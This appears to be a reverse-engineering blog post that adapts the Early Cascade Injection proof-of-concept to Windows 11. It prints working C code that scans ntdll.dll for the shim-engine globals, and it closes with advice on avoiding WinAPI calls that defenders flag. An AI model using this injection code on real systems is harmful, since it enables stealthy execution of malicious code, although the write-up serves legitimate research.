Early Cascade Injection
learning about early cascade injection, fixing for Win11, disassembly nonsense
Intro
Early Cascade injection was documented by Outflank as a novel process injection technique. The technique requires locating and modifying specific symbols in the .data and .mrdata sections of ntdll.dll in a remote process, which enables code execution via a callback routine.
This blog post will not go into all of the details of the technique, since it was covered in the original research blog post.
Instead, this blog post will cover how I played with the proof-of-concept code from @5pider and reversed a method to find offsets needed to execute on Windows 11 targets.
Here is my very simplified overview of the steps performed during the injection method:
- Spawn a process in a suspended state.
- Locate the offsets to g_ShimsEnabled and g_pfnSE_DllLoaded inside of ntdll.dll.
- Set the g_ShimsEnabled boolean to 1 (true) in the suspended process.
- Overwrite the function pointer g_pfnSE_DllLoaded with the address of a shellcode stub.
- Resume the thread.
- The shellcode stub immediately flips g_ShimsEnabled back to false (0).
- The shellcode stub queues an APC routine, which executes after the LdrInitializeThunk routine.
Finding Offsets
A crucial step for this injection technique is the ability to locate the addresses of:
- g_ShimsEnabled boolean value
- g_pfnSE_DllLoaded function pointer
g_pfnSE_DllLoaded is located in the .mrdata section and g_ShimsEnabled is in the .data section of ntdll.dll.
I found this helper function on Twitter from @m4ul3r_0x00 to help locate the memory addresses of those values in order to modify them later.
VOID FindOffsets()
{
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
    if (!ptr) {
        printf("[!] Failed to locate RtlQueryDepthSList\n");
        return;
    }

    // Scan memory until end of LdrpInitShimEngine
    // (bytes C3 CC = ret + int3 padding, read as the little-endian WORD 0xCCC3)
    while (i != 2) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    // Scan memory until bytes 48 8B 3D (mov rdi, qword [rel g_pfnSE_DllLoaded])
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }
    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);          // Skip the 3 opcode bytes to read the 32-bit relative offset
    g_pfnSE_DllLoaded = ptr + offset1 + 7; // Offset is relative to the end of the 7-byte instruction

    // Scan memory until bytes 44 38 25 (cmp byte [rel g_ShimsEnabled], r12b)
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x253844) {
        ptr++;
    }
    // [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
    offset2 = *(PULONG)(ptr + 3);          // Skip the 3 opcode bytes to read the 32-bit relative offset
    g_ShimsEnabled = ptr + offset2 + 7;    // Offset is relative to the end of the 7-byte instruction
}
Here is a breakdown of the function:
- Finding g_pfnSE_DllLoaded
  - The first while loop tries to move the pointer to the end of the LdrpInitShimEngine function by matching the byte pattern for the end of a function, 0xC3CC (a ret followed by int3 padding). The constant is reversed in the code because the WORD is read little-endian.
  - Then the next while loop searches for the next byte pattern which matches the instruction mov rdi, qword [rel g_pfnSE_DllLoaded], but only matches the first 3 bytes (0x488B3D) by using the mask 0xFFFFFF.
  - At this point the pointer is only 3 bytes away from the 32-bit relative offset of g_pfnSE_DllLoaded.
  - So add 3 bytes to the current pointer to land at [rel g_pfnSE_DllLoaded], then calculate the absolute address of g_pfnSE_DllLoaded by adding that offset to the address of the next instruction (ptr + 7).
// [ptr is here now] mov rdi, qword [rel g_pfnSE_DllLoaded]
offset1 = *(PULONG)(ptr + 3);          // Skip the 3 opcode bytes to read the 32-bit relative offset
g_pfnSE_DllLoaded = ptr + offset1 + 7; // Offset is relative to the end of the 7-byte instruction
- Finding g_ShimsEnabled
  - Then the last while loop searches for the byte pattern which matches the instruction cmp byte [rel g_ShimsEnabled], r12b (remember this for later 😉).
  - After it finds the pattern it does the same as above and calculates the absolute address of g_ShimsEnabled.
// [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
offset2 = *(PULONG)(ptr + 3);       // Skip the 3 opcode bytes to read the 32-bit relative offset
g_ShimsEnabled = ptr + offset2 + 7; // Offset is relative to the end of the 7-byte instruction
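To make the pointer math above easier to follow, here is a minimal sketch that runs on a plain byte array instead of ntdll.dll. The helper names (load_le24, resolve_rip_relative) and the sample addresses are made up for illustration and are not part of the PoC. One deliberate difference: the sketch reads the displacement as a signed 32-bit value, since RIP-relative displacements are signed, whereas the PoC uses ULONG and therefore relies on the target sitting at a higher address than the instruction.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reads three bytes the way the PoC's masked DWORD read sees them:
 * the first byte in memory ends up in the lowest bits (little-endian). */
uint32_t load_le24(const uint8_t *p)
{
    assert(p != NULL);
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16);
}

/* Resolves the target of a RIP-relative operand.
 * insn_addr: address the instruction would have in memory (hypothetical here)
 * insn:      pointer to the instruction bytes
 * disp_off:  offset of the 32-bit displacement inside the instruction
 * insn_len:  total instruction length (RIP points at the next instruction) */
uint64_t resolve_rip_relative(uint64_t insn_addr, const uint8_t *insn,
                              size_t disp_off, size_t insn_len)
{
    const uint8_t *d;
    uint32_t raw;
    int32_t disp;

    assert(insn != NULL);
    d = insn + disp_off;
    raw = (uint32_t)d[0] | ((uint32_t)d[1] << 8) |
          ((uint32_t)d[2] << 16) | ((uint32_t)d[3] << 24);
    disp = (int32_t)raw; /* displacement is signed */
    return insn_addr + insn_len + (uint64_t)(int64_t)disp;
}
```

For the bytes 48 8B 3D 10 00 00 00 placed at a pretend address of 0x1000, load_le24 yields 0x3D8B48 (which is why the constant in the PoC looks reversed) and resolve_rip_relative(0x1000, bytes, 3, 7) yields 0x1017, matching the ptr + offset + 7 calculation.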
After the memory addresses for these global symbols are located, the rest of the cascade injection technique can continue.
The Problem
This code worked fine when I tested on Windows 10, but failed on Windows 11 😢.
I decided to try and ‘fix’ this to also work on Windows 11.
My hypothesis:
The memory signatures inside of ntdll.dll in this PoC are probably not exactly the same on Windows 11, so the code fails to locate either g_ShimsEnabled or g_pfnSE_DllLoaded or both.
Let’s Fix It ⚒️
In order for this injection method to work on Windows 11 we have to reproduce the methodology above or come up with a more reliable method of locating the addresses.
Debugging NTDLL.DLL
So I loaded ntdll.dll into Binary Ninja on a Windows 11 machine with debug symbols to start analyzing the PE file.
As you saw in the function above, it first gets the address of the exported function RtlQueryDepthSList.
// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
if (!ptr) {
    printf("[!] Failed to locate RtlQueryDepthSList\n");
    return;
}
In Binja we can browse to the Symbols tab to view all functions, since we have debug symbols loaded for the DLL. I searched for the function's symbol and clicked into it to start analyzing it.
Great, next the PoC counted down 2 functions by looking for ret instructions followed by int3 padding (0xC3CC).
// Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
while (i != 2) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}
The code was nicely commented, so I knew it expected the pointer to land at the end of LdrpInitShimEngine after this.
Wait! In the screenshot above you can see the 3rd function down is RtlAllocateAndInitializeSid, not LdrpInitShimEngine.
The functions in ntdll.dll appear to be in a different order on Windows 11. At least now we know where to begin…
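The ret-counting step is easy to try on a synthetic buffer. The sketch below is not the PoC's loop: skip_ret_int3 is a hypothetical helper that adds a length bound and returns the offset just past the n-th C3 CC pair (the PoC's loop instead stops one byte earlier, on the padding byte, and has no bound). Keep in mind that C3 CC can also show up inside instruction operands or data, so counting pairs is a heuristic, not a real function boundary detector.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the offset just past the n-th "C3 CC" (ret + int3) pair in buf,
 * 0 when n is 0, or -1 if fewer than n pairs exist within len bytes. */
ptrdiff_t skip_ret_int3(const uint8_t *buf, size_t len, unsigned n)
{
    unsigned seen = 0;
    size_t i;

    assert(buf != NULL);
    if (n == 0)
        return 0;
    for (i = 0; i + 1 < len; i++) {
        if (buf[i] == 0xC3 && buf[i + 1] == 0xCC) {
            seen++;
            if (seen == n)
                return (ptrdiff_t)(i + 2);
        }
    }
    return -1; /* ran out of bytes before finding n pairs */
}
```

Because the result depends entirely on how many functions sit between the starting export and the target, a different function order (as seen here on Windows 11) changes where the scan ends up even though the loop itself is unchanged.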
Reversing Original PoC
First I needed to figure out why the PoC chose the end of LdrpInitShimEngine as the function to stop after.
I determined it was chosen because the next function was supposed to be LdrpLoadShimEngine, which contains two VERY important instructions:
mov rdi, qword [rel g_pfnSE_DllLoaded]
cmp byte [rel g_ShimsEnabled], r13b
LdrpLoadShimEngine references both of the variables we need by their relative addresses. This means that we can grab those addresses and calculate their absolute addresses in memory.
This is what the function for Win10 does.
So I basically stuck with the original PoC’s methodology to get it working for Win11.
The function will do the following:
- Find the closest exported function to LdrpLoadShimEngine.
- Get the address of that exported function.
- Move the index pointer past 'x' number of rets until it's at LdrpLoadShimEngine.
- Look for the byte patterns that reference the variables' relative addresses.
- Calculate their absolute addresses.
- Finish the injection steps.
Find the Closest Exported Function
The ntdll.dll library has many exported and non-exported functions. For any exported function we could simply use GetProcAddress in order to get a pointer to the function. But since LdrpLoadShimEngine is not an exported function, we have to find the closest exported one and then count forwards (or backwards).
We can start at LdrpLoadShimEngine and count backwards until we see an exported function.
Six (6) rets above we can see RtlUnlockMemoryBlockLookaside, which is an exported function, meaning we can easily get the address to it with GetProcAddress.
Now we can update our code to use RtlUnlockMemoryBlockLookaside as the starting function and count 6 rets down to find LdrpLoadShimEngine.
// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
if (!ptr) {
    printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\n");
    return;
}
// Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
while (i != 6) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}
Fixing Byte Signature
Now there is just one more thing to address. While analyzing LdrpLoadShimEngine, I found that Win11 uses a different register for the cmp instruction.
// Windows 10
cmp byte [rel g_ShimsEnabled], r12b
// Windows 11
cmp byte [rel g_ShimsEnabled], r13b
Win10 uses r12b but Win11 uses r13b. This means that the pattern matching logic from the PoC will fail to find the correct address since the bytes are different.
We can easily update the code to check for 0x44382D instead of 0x443825.
while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
    ptr++;
}
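The one-byte difference between the two signatures comes from the ModRM byte, where bits 5..3 select the register operand and the REX.R bit of the prefix extends it to r8 through r15. As a small sketch (the function names are mine, not from the PoC), decoding the last signature byte shows why 0x25 means r12b and 0x2D means r13b while the addressing mode stays RIP-relative in both:

```c
#include <assert.h>
#include <stdint.h>

/* Decodes the register operand number (0-15) from a REX prefix and a ModRM byte.
 * REX.R (bit 2 of the prefix) supplies bit 3; ModRM bits 5..3 supply bits 2..0. */
unsigned modrm_reg(uint8_t rex, uint8_t modrm)
{
    unsigned rex_r;
    unsigned reg;

    assert((rex & 0xF0) == 0x40); /* REX prefixes are 0x40..0x4F */
    rex_r = (rex >> 2) & 1u;
    reg = (modrm >> 3) & 7u;
    return (rex_r << 3) | reg;
}

/* Returns 1 when ModRM selects RIP-relative addressing (mod = 00, rm = 101). */
int modrm_is_rip_relative(uint8_t modrm)
{
    return (modrm & 0xC7) == 0x05;
}
```

With the prefix 0x44, modrm_reg returns 12 for 0x25 and 13 for 0x2D. The same decoding applied to 48 8B 3D gives register 7, which is rdi.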
Final Thoughts
After making those changes to the function I was able to successfully execute the injection method on Windows 11.
The final updated function looks like this:
// Values to overwrite in NTDLL
PVOID g_pfnSE_DllLoaded = NULL;
PVOID g_ShimsEnabled = NULL;

/*
 * Locate g_ShimsEnabled and g_pfnSE_DllLoaded on Windows 11
 */
VOID FindOffsetsWin11()
{
    /*
        On Windows 11, functions are ordered differently inside ntdll.
        We want to find RtlUnlockMemoryBlockLookaside because it's the closest exported function to
        LdrpLoadShimEngine (which contains the instructions we want).
    */
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
    if (!ptr) {
        printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\n");
        return;
    }

    // Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
    while (i != 6) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x488B3D (mov rdi, qword [rel g_pfnSE_DllLoaded])
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }
    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);          // Skip the 3 opcode bytes to read the 32-bit relative offset
    g_pfnSE_DllLoaded = ptr + offset1 + 7; // Offset is relative to the end of the 7-byte instruction

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x44382D (cmp byte [rel g_ShimsEnabled], r13b)
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
        ptr++;
    }
    // [ptr is here] cmp byte [rel g_ShimsEnabled], r13b
    offset2 = *(PULONG)(ptr + 3);          // Skip the 3 opcode bytes to read the 32-bit relative offset
    g_ShimsEnabled = ptr + offset2 + 7;    // Offset is relative to the end of the 7-byte instruction
}
Improvements
I had the AI wizard generate me a function to determine the Windows version then execute the correct FindOffsets function.
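The generated function itself isn't shown here, so the following is only a rough sketch of the selection logic, not the code from the repository. It assumes the OS build number has already been obtained (for example from RtlGetVersion) and relies on the fact that Windows 11 still reports major version 10 but uses build numbers starting at 22000. The enum and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical labels for the two offset-finding routines in this post. */
typedef enum {
    FINDER_WIN10, /* would call FindOffsets()      */
    FINDER_WIN11  /* would call FindOffsetsWin11() */
} finder_kind;

/* Picks a routine from the OS build number.
 * Windows 11 builds start at 22000; anything lower is treated as Windows 10. */
finder_kind pick_finder(uint32_t build_number)
{
    assert(build_number != 0); /* 0 would mean the version lookup failed */
    return build_number >= 22000u ? FINDER_WIN11 : FINDER_WIN10;
}
```

A build-number switch is only a coarse proxy: the function order and register choice inside ntdll.dll may well differ between builds of the same release, so each branch should still be checked against the specific build being tested.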
Some improvements to this code could be:
- Avoid suspicious WinAPI calls (GetProcAddress, GetModuleHandleA, WriteProcessMemory, ResumeThread)
- More reliable method of locating the symbols in NTDLL
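On the second point, one possible direction (a sketch I have not validated against real ntdll.dll builds) is a bounded search with a per-byte mask, so a single signature tolerates the register change seen between Windows 10 and Windows 11. The helper name find_masked is hypothetical. Masking the ModRM byte with 0xC7 ignores the register bits, so 44 38 25 and 44 38 2D both match, and the explicit length means the scan cannot run off the end of the buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first position in buf where
 * (buf[i + k] & mask[k]) == (pat[k] & mask[k]) for every k < plen,
 * or -1 if there is no such position within len bytes. */
ptrdiff_t find_masked(const uint8_t *buf, size_t len,
                      const uint8_t *pat, const uint8_t *mask, size_t plen)
{
    size_t i;

    assert(buf != NULL && pat != NULL && mask != NULL);
    if (plen == 0 || plen > len)
        return -1;
    for (i = 0; i + plen <= len; i++) {
        size_t k = 0;
        while (k < plen && (buf[i + k] & mask[k]) == (pat[k] & mask[k]))
            k++;
        if (k == plen)
            return (ptrdiff_t)i;
    }
    return -1;
}
```

With pat = {0x44, 0x38, 0x25} and mask = {0xFF, 0xFF, 0xC7}, the search matches a cmp byte [rel ...] against any of r8b through r15b. The trade-off is that a looser signature is more likely to hit an unrelated instruction, so the match would still need a sanity check, such as confirming the resolved address falls inside the expected section.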
The final code can be found on my GitHub here.
Credits
- Original research - https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/
- PoC from 5pider - https://github.com/Cracked5pider/earlycascade-injection
- Function to find symbols from @m4ul3r_0x00 - https://x.com/m4ul3r_0x00/status/1856362500310143174